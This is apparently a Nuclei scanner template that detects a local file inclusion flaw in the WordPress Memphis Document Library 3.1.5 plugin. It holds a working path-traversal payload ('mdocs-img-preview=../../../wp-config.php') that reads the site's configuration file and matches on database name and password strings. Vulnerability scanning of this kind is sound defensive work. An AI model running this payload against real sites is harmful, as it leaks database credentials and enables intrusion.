id: wp-memphis-documents-library-lfi

info:
  name: WordPress Memphis Document Library 3.1.5 - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: WordPress Memphis Document Library 3.1.5 is vulnerable to local file inclusion.
  reference:
    - https://www.exploit-db.com/exploits/39593
    - https://wpscan.com/vulnerability/53999c06-05ca-44f1-b713-1e4d6b4a3f9f
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  tags: wpscan,wordpress,wp-plugin,lfi,edb

requests:
  - method: GET
    path:
      - '{{BaseURL}}/mdocs-posts/?mdocs-img-preview=../../../wp-config.php'
      - '{{BaseURL}}/?mdocs-img-preview=../../../wp-config.php'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "DB_NAME"
          - "DB_PASSWORD"
        part: body
        condition: and

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/07/29
